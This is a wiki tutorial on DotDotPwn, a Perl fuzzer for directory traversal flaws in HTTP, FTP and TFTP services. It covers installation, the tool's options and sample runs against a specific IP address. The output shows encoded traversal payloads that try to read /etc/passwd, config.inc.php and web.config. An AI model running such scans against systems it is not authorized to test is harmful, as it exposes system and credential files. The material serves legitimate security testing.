Dotdotpwn

From aldeid
Jump to navigation Jump to search

Description

DotDotPwn is a Directory Traversal Fuzzer written by Christian Navarrete (aka chr1x). It enables to identify directory traversal vulnerabilities in various services (HTTP, FTP, TFTP). Fuzzing modules are:

  • HTTP
  • HTTP URL
  • FTP
  • TFTP
  • Payload (Protocol independent)
  • STDOUT

Written in Perl, the application can be installed on *nix and Windows plateforms.

For more information on DotDotPwn, refer to the complete documentation here: http://chr1x.sectester.net/dotdotpwn/README.txt.

Installation

Prerequisites

Perl

First thing: install Perl

  • Debian, *ubuntu:
$ sudo apt-get install perl
  • OpenSuse:
> sudo yast2 -i perl

Nmap

Nmap is used only for the OS fingerprint (-O parameter).

  • Debian, *ubuntu:
$ sudo apt-get install nmap
  • OpenSuse:
> sudo yast2 -i nmap

Perl modules

DotDotPwn requires following Perl dependencies, that can easily be installed via CPAN. 

$ sudo cpan
cpan[1]> install HTTP::Lite
cpan[2]> install Net::FTP
cpan[3]> install TFTP
cpan[4]> install Time::HiRes
cpan[5]> install Socket
cpan[6]> install IO::Socket
cpan[7]> install Getopt::Std
cpan[8]> install Switch

DotDotPwn

$ mkdir -p /data/src/
$ wget http://chr1x.sectester.net/dotdotpwn/dotdotpwn-v2.1.tar.gz
$ tar xzvf dotdotpwn-v2.1.tar.gz

Usage

Basic usage

$ ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]

Options

-m <module>
Module (http | http-url | ftp | tftp | payload | stdout)
-h <host>
Hostname
-O
Operating System detection for intelligent fuzzing (nmap)
-s
Service version detection (banner grabber)
-d
Deep of traversals (e.g. deep 3 equals to ../../../)
default: 6
-f
Specific filename (e.g. /etc/motd)
default: filenames defined in the TraversalEngine.pm
-u <url>
URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k <string_pattern>
String pattern to match in the response if it's vulnerable (e.g. "root:" if trying with /etc/passwd)
-U <username>
Username
default: 'anonymous'
-P <password>
Password
default: '[email protected]'
-p <file>
Filename with the payload to be sent and the part to be fuzzed marked as TRAVERSAL
-x <port>
Port to connect
default: HTTP=80, FTP=21, TFTP=69
-t <number>
Time in milliseconds between each test
default: 300 (.3 second)
-b
Break after the first vulnerability is found
-q
Quiet mode (doesn't print each attemp)

HTTP directory traversal test

The command to automatize a http directory traversal test is: 

$ ./ddpwn.pl -m http -h 80.14.163.161

It is recommended that you export the results in a text file to be analyzed later: 

$ ./ddpwn.pl -m http -h 80.14.163.161 > http_audit.txt

Here is an extract of the results: 

[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cconfig.inc.php
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cweb.config
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cconfig.inc.php
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cweb.config
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cconfig.inc.php
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cweb.config

It gives the status of the HTTP request for each tested payload (e.g. Status: 404) and the payload content (e.g. Traversal String: ..%%32%66..%%32%66..%%32%66..%%32%66boot.ini). If you are able to find 200 as status, the tested site is vulnerable and you can test/exploit it real.

Click here for detailed HTTP status codes.

FTP directory traversal test

$ ./ddpwn.pl -m ftp -h 80.14.163.161

Comments

Retrieved from "https://www.aldeid.com/w/index.php?title=Dotdotpwn&oldid=35472"